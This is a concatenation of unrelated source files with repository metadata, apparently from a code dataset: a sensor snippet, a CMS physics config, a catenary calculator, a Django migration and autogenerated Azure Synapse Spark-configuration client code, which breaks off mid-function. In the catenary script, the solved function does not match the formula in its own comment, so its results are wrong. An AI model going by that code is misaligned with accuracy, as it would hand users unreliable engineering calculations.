i2c = I2C(-1, clk, sda, freq=100000)
sensor = AHT10(i2c)
sensor.sensor_init()
sensor.is_calibration_enabled()
print("current temp: %.2f "%sensor.read_temperature())
print("current humi: %.2f %%"%sensor.read_humidity())
|
[
"SummerGift@qq.com"
] |
SummerGift@qq.com
|
7efbf28a97b17e623a9be0e1d817befa061257fc
|
fe061550aa4a6d894aba6fc91ec3f4a9c276ee5d
|
/ALCARAW_RECO/python/pdfSystematics_cff.py
|
25c61242fc5df1a2a7699333ce47b47e4d7cdd91
|
[] |
no_license
|
ldcorpe/ECALELF
|
0f11c04c63cd4ef9c0fac9168d827c8b4d99eada
|
6f8196c6c455b9ff092007ea5d0e69fc6e68a517
|
refs/heads/master
| 2020-12-30T22:08:58.160533
| 2014-03-05T09:35:07
| 2014-03-05T09:35:07
| 17,245,358
| 0
| 0
| null | 2015-07-23T17:14:56
| 2014-02-27T10:37:42
|
C++
|
UTF-8
|
Python
| false
| false
| 727
|
py
|
import FWCore.ParameterSet.Config as cms
# Produce PDF weights (maximum is 3)
pdfWeights = cms.EDProducer("PdfWeightProducer",
# Fix POWHEG if buggy (this PDF set will also appear on output,
# so only two more PDF sets can be added in PdfSetNames if not "")
#FixPOWHEG = cms.untracked.string("cteq66.LHgrid"),
#GenTag = cms.untracked.InputTag("genParticles"),
PdfInfoTag = cms.untracked.InputTag("generator"),
PdfSetNames = cms.untracked.vstring(
"cteq66.LHgrid"
, "MRST2006nnlo.LHgrid"
, "NNPDF10_100.LHgrid"
)
)
|
[
"shervin@cern.ch"
] |
shervin@cern.ch
|
11b5246e31e2f5ef8ad5e9bcb8fdfabe438a1953
|
6defd2219720396842ac564e7d6bf4f5146eddda
|
/pycatenary.py
|
0918a0110a0feec62435cf74110d084ab14fdc9e
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
fsanges/pyCatenary-NoElast
|
2e111d379d36582b6b1851d4e4eb2bc004f4dc25
|
5901b06a208b802f12990ca0ecdce8c975c4a0e5
|
refs/heads/master
| 2021-12-01T20:55:56.685777
| 2013-04-01T11:46:34
| 2013-04-01T11:46:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,660
|
py
|
# !usr/bin/env python
# catenary calculation, re-written in python - NO Elasticity!!!
import math
import numpy as np
import matplotlib.pyplot as plt
from scipy.optimize import fsolve
from inout import write_file
def cat(a):
# defining catenary function
#catenary eq (math): a*sinh(L/(2*a)+atanh(d/S))+a*sinh(L/(2*a)-atanh(d/S))-S=0
return a*math.sinh(L/(2*a))+math.atanh(d/S)+a*math.sinh(L/(2*a))-math.atanh(d/S)-S
L=float(input("Horizontal Distance between supports [m]: "))
d=float(input ("Vertical Distance between supports [m]: "))
S=float(input("Length of cable [m] - must be greater than distance between supports: "))
w=float(input("Unit weight of cable [kg/m]: "))
za=float(input("Elevation of higher support from reference plane [m]: "))
#checking if cable length is bigger than total distance between supports
distance=(L**2+d**2)**0.5
if S <= distance:
print ("Length of cable must be greater than TOTAL distance between supports!")
S=float(input("Length of cable [m]: "))
else:
pass
# solving catenary function for 'a'
a=fsolve(cat, 1)
# hor. distance between lowest catenary point (P) to higher support point (La)
La=a*(L/(2*a)+math.atanh(d/S))
# hor. distance between lowest catenary point (P) to lower support point (Lb)
Lb=L-La
# vert. distance from higher support point to lowest point (P) in catenary (ha)
ha=a*math.cosh(La/a)-a
## calculating reaction forces and angles
# catenary lenght between support "A" (higher) and "P" - Sa
Sa=a*math.sinh(La/a)
# catenary lenght between support "B" )lower) and "P" - Sb
Sb=a*math.sinh(Lb/a)
# horizontal tension - constant through catenary: H
H=w*a
# vertical tension at "A" (Va) and "B" (Vb)
Va=Sa*w
Vb=Sb*w
# tension at "A" (TA) and B (TB)
TA=(H**2+Va**2)**0.5
TB=(H**2+Vb**2)**0.5
# inclination angles from vertical at "A" (ThetA) and B (ThetB)
ThetA=math.atan(H/Va)
ThetB=math.atan(H/Vb)
ThetAd=ThetA*180/math.pi;
ThetBd=ThetB*180/math.pi;
# establishing A, B and P in coordinate system
# index "a" corresponding to point "A", "b" to "B"-point and "P" to lowest caten. point
zb=za-d
zp=za-ha
xa=La
xp=0
xb=-Lb
# writting results to file
fname='catenary_res.txt'
fn=open(fname, 'a')
write_file(fn, "Horizontal Distance between supports in meters: ", round(L,3))
write_file(fn, "Catenary length in meters: ", round(S,3))
write_file(fn, "Vertical Distance Between supports in meters: ", round(d,3))
write_file(fn, "Unit Weight of Catenary line in kg/m: ", round(w,3))
write_file(fn, "Elevation of higher support (A) from reference plane in meters: ", round(za,3))
write_file(fn, "\Catenary coef.: ", round(a,5))
write_file(fn, "Horizontal tension in kg (constant along line: ", round(H,3))
write_file(fn, "Vertical tension in A in kg: ", round(Va,3))
write_file(fn, "Total tension in A in kg: ", round(TA,3))
write_file(fn, "Total tension in B in kg: ", round(TB,3))
write_file(fn, "Inclination angle from vertical at A in radians: ", round(ThetA,3))
write_file(fn, "Inclination angle from vertical at B in radians: ", round(ThetB,3))
write_file(fn, "Inclination angle from vertical at A in degrees: ", round(ThetAd,3))
write_file(fn, "Inclination angle from vertical at B in degrees: ", round(ThetBd,3))
fn.close()
# graphing catenary curve - matplotlib & writting coordinates in file
xinc=L/100
y=[]
xc=[]
fncoords="catenary_coords.txt"
fn=open(fncoords, "a")
for x in np.arange (xb, xa+xinc, xinc):
ycal=a*math.cosh(x/a)
fn.write("\n")
fn.write(str(round(x,3)))
fn.write("\t")
fn.write(str(round(ycal[0],3)))
y.append(ycal)
xc.append(x)
fn.close()
# plotting, finally
plt.plot(xc,y)
plt.xlabel("X-distance [m]")
plt.ylabel("Y-distance [m]")
plt.grid()
plt.show()
|
[
"deki.djokic@gmail.com"
] |
deki.djokic@gmail.com
|
7f7434016d940893c9cb3b72ea218d424554329e
|
ea416617fdf6632081cb91fccfb2e8fa5965ad9e
|
/plan/migrations/0002_route.py
|
f4cf7c2b4ef825c3680cda2b86819c90200f91f0
|
[] |
no_license
|
fergalpowell/final_year_project
|
249f8289ab84b5daba98a9f262e1a2637760cd49
|
568e8cb646ccf5b6a25c1368ffd2204d7d5f08ab
|
refs/heads/master
| 2021-09-13T17:29:26.868935
| 2018-05-02T15:03:14
| 2018-05-02T15:03:14
| 112,532,473
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 698
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-04-17 11:22
from __future__ import unicode_literals
import django.contrib.gis.db.models.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('plan', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Route',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('route', django.contrib.gis.db.models.fields.LineStringField(srid=4326)),
('name', models.CharField(max_length=250)),
],
),
]
|
[
"fergal.powell@gmail.com"
] |
fergal.powell@gmail.com
|
90352a180e75d18219b8cba394d4d2b8f03de187
|
aa0270b351402e421631ebc8b51e528448302fab
|
/sdk/synapse/azure-synapse-artifacts/azure/synapse/artifacts/operations/_spark_configuration_operations.py
|
9d5b1194a4b1cae79ac490bbe3402239b826e729
|
[
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
fangchen0601/azure-sdk-for-python
|
d04a22109d0ff8ff209c82e4154b7169b6cb2e53
|
c2e11d6682e368b2f062e714490d2de42e1fed36
|
refs/heads/master
| 2023-05-11T16:53:26.317418
| 2023-05-04T20:02:16
| 2023-05-04T20:02:16
| 300,440,803
| 0
| 0
|
MIT
| 2020-10-16T18:45:29
| 2020-10-01T22:27:56
| null |
UTF-8
|
Python
| false
| false
| 33,298
|
py
|
# pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, Callable, Dict, Iterable, Optional, TypeVar, Union, cast
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.core.polling.base_polling import LROBasePolling
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.utils import case_insensitive_dict
from .. import models as _models
from .._serialization import Serializer
from .._vendor import _convert_request, _format_url_section
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_get_spark_configurations_by_workspace_request(**kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations")
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_create_or_update_spark_configuration_request(
spark_configuration_name: str, *, if_match: Optional[str] = None, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}")
path_format_arguments = {
"sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
if if_match is not None:
_headers["If-Match"] = _SERIALIZER.header("if_match", if_match, "str")
if content_type is not None:
_headers["Content-Type"] = _SERIALIZER.header("content_type", content_type, "str")
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="PUT", url=_url, params=_params, headers=_headers, **kwargs)
def build_get_spark_configuration_request(
spark_configuration_name: str, *, if_none_match: Optional[str] = None, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}")
path_format_arguments = {
"sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
if if_none_match is not None:
_headers["If-None-Match"] = _SERIALIZER.header("if_none_match", if_none_match, "str")
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_delete_spark_configuration_request(spark_configuration_name: str, **kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}")
path_format_arguments = {
"sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="DELETE", url=_url, params=_params, headers=_headers, **kwargs)
def build_rename_spark_configuration_request(spark_configuration_name: str, **kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}/rename")
path_format_arguments = {
"sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
if content_type is not None:
_headers["Content-Type"] = _SERIALIZER.header("content_type", content_type, "str")
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="POST", url=_url, params=_params, headers=_headers, **kwargs)
class SparkConfigurationOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.synapse.artifacts.ArtifactsClient`'s
:attr:`spark_configuration` attribute.
"""
models = _models
def __init__(self, *args, **kwargs):
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def get_spark_configurations_by_workspace(self, **kwargs: Any) -> Iterable["_models.SparkConfigurationResource"]:
"""Lists sparkconfigurations.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SparkConfigurationResource or the result of
cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.synapse.artifacts.models.SparkConfigurationResource]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
cls: ClsType[_models.SparkConfigurationListResponse] = kwargs.pop("cls", None)
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_get_spark_configurations_by_workspace_request(
api_version=api_version,
template_url=self.get_spark_configurations_by_workspace.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
else:
request = HttpRequest("GET", next_link)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("SparkConfigurationListResponse", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem) # type: ignore
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
return pipeline_response
return ItemPaged(get_next, extract_data)
get_spark_configurations_by_workspace.metadata = {"url": "/sparkconfigurations"}
def _create_or_update_spark_configuration_initial(
self,
spark_configuration_name: str,
properties: _models.SparkConfiguration,
if_match: Optional[str] = None,
**kwargs: Any
) -> Optional[_models.SparkConfigurationResource]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json"))
cls: ClsType[Optional[_models.SparkConfigurationResource]] = kwargs.pop("cls", None)
_spark_configuration = _models.SparkConfigurationResource(properties=properties)
_json = self._serialize.body(_spark_configuration, "SparkConfigurationResource")
request = build_create_or_update_spark_configuration_request(
spark_configuration_name=spark_configuration_name,
if_match=if_match,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._create_or_update_spark_configuration_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("SparkConfigurationResource", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_spark_configuration_initial.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
@distributed_trace
def begin_create_or_update_spark_configuration(
self,
spark_configuration_name: str,
properties: _models.SparkConfiguration,
if_match: Optional[str] = None,
**kwargs: Any
) -> LROPoller[_models.SparkConfigurationResource]:
"""Creates or updates a sparkconfiguration.
:param spark_configuration_name: The spark Configuration name. Required.
:type spark_configuration_name: str
:param properties: Properties of Spark Configuration. Required.
:type properties: ~azure.synapse.artifacts.models.SparkConfiguration
:param if_match: ETag of the sparkConfiguration entity. Should only be specified for update,
for which it should match existing entity or can be * for unconditional update. Default value
is None.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be LROBasePolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either SparkConfigurationResource or the result
of cls(response)
:rtype:
~azure.core.polling.LROPoller[~azure.synapse.artifacts.models.SparkConfigurationResource]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json"))
cls: ClsType[_models.SparkConfigurationResource] = kwargs.pop("cls", None)
polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = self._create_or_update_spark_configuration_initial(
spark_configuration_name=spark_configuration_name,
properties=properties,
if_match=if_match,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("SparkConfigurationResource", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method: PollingMethod = cast(
PollingMethod, LROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
)
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_create_or_update_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
@distributed_trace
def get_spark_configuration(
self, spark_configuration_name: str, if_none_match: Optional[str] = None, **kwargs: Any
) -> Optional[_models.SparkConfigurationResource]:
"""Gets a sparkConfiguration.
:param spark_configuration_name: The spark Configuration name. Required.
:type spark_configuration_name: str
:param if_none_match: ETag of the sparkConfiguration entity. Should only be specified for get.
If the ETag matches the existing entity tag, or if * was provided, then no content will be
returned. Default value is None.
:type if_none_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SparkConfigurationResource or None or the result of cls(response)
:rtype: ~azure.synapse.artifacts.models.SparkConfigurationResource or None
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
cls: ClsType[Optional[_models.SparkConfigurationResource]] = kwargs.pop("cls", None)
request = build_get_spark_configuration_request(
spark_configuration_name=spark_configuration_name,
if_none_match=if_none_match,
api_version=api_version,
template_url=self.get_spark_configuration.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 304]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("SparkConfigurationResource", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
def _delete_spark_configuration_initial( # pylint: disable=inconsistent-return-statements
self, spark_configuration_name: str, **kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
cls: ClsType[None] = kwargs.pop("cls", None)
request = build_delete_spark_configuration_request(
spark_configuration_name=spark_configuration_name,
api_version=api_version,
template_url=self._delete_spark_configuration_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
_delete_spark_configuration_initial.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
@distributed_trace
def begin_delete_spark_configuration(self, spark_configuration_name: str, **kwargs: Any) -> LROPoller[None]:
"""Deletes a sparkConfiguration.
:param spark_configuration_name: The spark Configuration name. Required.
:type spark_configuration_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be LROBasePolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
cls: ClsType[None] = kwargs.pop("cls", None)
polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = self._delete_spark_configuration_initial( # type: ignore
spark_configuration_name=spark_configuration_name,
api_version=api_version,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method: PollingMethod = cast(
PollingMethod, LROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
)
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_delete_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
def _rename_spark_configuration_initial( # pylint: disable=inconsistent-return-statements
self, spark_configuration_name: str, new_name: Optional[str] = None, **kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json"))
cls: ClsType[None] = kwargs.pop("cls", None)
_request = _models.ArtifactRenameRequest(new_name=new_name)
_json = self._serialize.body(_request, "ArtifactRenameRequest")
request = build_rename_spark_configuration_request(
spark_configuration_name=spark_configuration_name,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._rename_spark_configuration_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
_rename_spark_configuration_initial.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}/rename"}
@distributed_trace
def begin_rename_spark_configuration(
self, spark_configuration_name: str, new_name: Optional[str] = None, **kwargs: Any
) -> LROPoller[None]:
"""Renames a sparkConfiguration.
:param spark_configuration_name: The spark Configuration name. Required.
:type spark_configuration_name: str
:param new_name: New name of the artifact. Default value is None.
:type new_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be LROBasePolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json"))
cls: ClsType[None] = kwargs.pop("cls", None)
polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = self._rename_spark_configuration_initial( # type: ignore
spark_configuration_name=spark_configuration_name,
new_name=new_name,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements
if cls:
